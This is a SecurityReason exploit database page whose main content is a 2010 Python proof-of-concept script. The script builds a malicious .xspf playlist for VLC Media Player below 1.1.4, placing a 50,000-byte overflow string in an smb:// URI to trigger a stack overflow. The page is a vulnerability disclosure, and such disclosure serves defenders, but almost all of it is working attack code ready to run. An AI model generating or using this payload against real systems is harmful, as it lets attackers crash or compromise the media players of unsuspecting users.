|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 8946 Credit : hadji samir Date : 05.09.2010 Exploit Code : #!/usr/bin/python # # Exploit Title: VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC # Date: 04-09-2010 # Author: Hadji Samir , s-Dz[at]hotmail[dot]fr # Software Link: http://sourceforge.net/projects/vlc/files/1.1.4/win32/vlc-1.1.4-win32 .exe/download?use_mirror=garr # Version: VLC Media Player < 1.1.4 # Tested on: Windows XP sp2 with VLC 1.1.4 # CVE : # Notes: Samir tjrs mahboul-3lik ... # ########################################################################### #################################### data1 = ( "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31" "\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54" "\x46\x2D\x38\x22\x3F\x3E\x0D\x0A\x3C\x70\x6C\x61\x79\x6C\x69\x73" "\x74\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x22\x20\x78\x6D" "\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E" "\x65\x78\x65\x6D\x70\x6C\x65\x2E\x6F\x72\x67\x2F\x22\x20\x78\x6D" "\x6C\x6E\x73\x3A\x76\x6C\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F" "\x77\x77\x77\x2E\x65\x78\x65\x6D\x70\x6C\x65\x2E\x6F\x72\x67\x2F" "\x22\x3E\x0D\x0A\x09\x3C\x74\x69\x74\x6C\x65\x3E\x50\x6C\x61\x79" "\x6C\x69\x73\x74\x3C\x2F\x74\x69\x74\x6C\x65\x3E\x0D\x0A\x09\x3C" "\x74\x72\x61\x63\x6B\x4C\x69\x73\x74\x3E\x0D\x0A\x09\x09\x3C\x74" "\x72\x61\x63\x6B\x3E\x0D\x0A\x09\x09\x09\x3C\x6C\x6F\x63\x61\x74" "\x69\x6F\x6E\x3E\x73\x6D\x62\x3A\x2F\x2F\x65\x78\x61\x6D\x70\x6C" "\x65\x2E\x63\x6F\x6D\x40\x77\x77\x77\x2E\x65\x78\x61\x6D\x70\x6C" "\x65\x2E\x63\x6F\x6D\x2F\x23\x7B") buff = ("\x41" * 50000 ) data2 = ( "\x7D\x3C\x2F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3E" "\x3C\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x20\x61\x70\x70\x6C\x69" "\x63\x61\x74\x69\x6F\x6E\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77" "\x77\x77\x2E\x76\x69\x64\x65\x6F\x6C\x61\x6E\x2E\x6F\x72\x67\x2F" "\x76\x6C\x63\x2F\x70\x6C\x61\x79\x6C\x69\x73\x74\x2F\x30\x22\x3E" "\x0D\x0A\x09\x09\x09\x09\x3C\x76\x6C\x63\x3A\x69\x64\x3E\x30\x3C" "\x2F\x76\x6C\x63\x3A\x69\x64\x3E\x0D\x0A\x09\x09\x09\x3C\x2F\x65" "\x78\x74\x65\x6E\x73\x69\x6F\x6E\x3E\x0D\x0A\x09\x09\x3C\x2F\x74" "\x72\x61\x63\x6B\x3E\x0D\x0A\x09\x3C\x2F\x74\x72\x61\x63\x6B\x4C" "\x69\x73\x74\x3E\x0D\x0A\x3C\x2F\x70\x6C\x61\x79\x6C\x69\x73\x74" "\x3E\x0D\x0A\x0D\x0A") wizz = open("Mahboul-3lik.xspf","w") wizz.write(data1 + buff + data2) wizz.close()  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |